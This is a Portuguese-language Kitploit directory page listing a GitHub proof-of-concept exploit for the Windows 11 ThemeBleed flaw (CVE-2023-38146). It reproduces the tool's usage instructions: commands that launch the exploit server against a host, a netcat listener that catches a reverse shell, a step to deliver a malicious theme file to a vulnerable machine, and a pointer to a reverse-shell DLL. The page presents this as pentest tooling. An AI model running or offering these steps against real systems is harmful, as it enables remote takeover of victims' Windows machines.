Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-38146 — PoC para o ThemeBleed do Windows 11 CVE-2023-38146 escrito em python usando impacket. https://jnns.de/posts/cve-2023-38146-poc/ | Kitploit
Ferramentas/GitHubGitHub/jnnshschl/cve-2023-38146
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoDesenvolvimento de Payloads
GitHubjnnshschl/cve-2023-38146

CVE-2023-38146

PoC para o ThemeBleed do Windows 11 CVE-2023-38146 escrito em python usando impacket. https://jnns.de/posts/cve-2023-38146-poc/

Ver Repositório
274há 2 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

PoC para o exploit ThemeBleed CVE-2023-38146 (Temas do Windows 11)

Fortemente inspirado por https://github.com/gabe-k/themebleed que só roda no Windows (a razão pela qual decidi escrever isto).

Usei código modificado do impacket smbserver.py (https://github.com/fortra/impacket/blob/master/impacket/smbserver.py)

Coisas úteis: https://github.com/TalAloni/SMBLibrary/blob/master/SMBLibrary/NTFileStore/Enums/NtCreateFile/ShareAccess.cs

Post do blog: https://jnns.de/posts/cve-2023-38146-poc/

Como usar isto:

Instale os requisitos e execute a aplicação:

root@kitploit:~
pip3 install -r requirements.txt
python3 themebleed.py -r HOST -p 4711

# start nc listener in other shell
rlwrap -cAr nc -lvnp 4711

Use o "evil_theme.theme" ou "evil_theme.themepack" em uma máquina vulnerável.

Lucro!

Arquivo de DLL Personalizado:

Coloque uma DLL com uma função exportada "VerifyThemeVersion" na pasta "./td/", com o nome "Aero.msstyles_vrf_evil.dll". Você deve conseguir encontrar uma DLL de exemplo usando o Google ou usar meu exemplo https://github.com/Jnnshschl/ThemeBleedReverseShellDLL.

root@kitploit:~
pip3 install -r requirements.txt
python3 themebleed.py -r HOST --no-dll

# start nc listener in other shell
rlwrap -cAr nc -lvnp 4711
Baixar ferramenta